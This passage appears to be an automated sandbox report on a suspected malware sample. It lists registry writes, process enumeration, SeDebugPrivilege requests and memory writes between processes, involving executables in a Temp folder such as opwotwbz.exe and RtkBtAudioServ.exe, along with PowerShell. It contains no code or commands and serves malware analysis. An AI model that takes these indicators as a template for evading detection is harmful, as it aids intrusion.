Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 3344 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3344 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
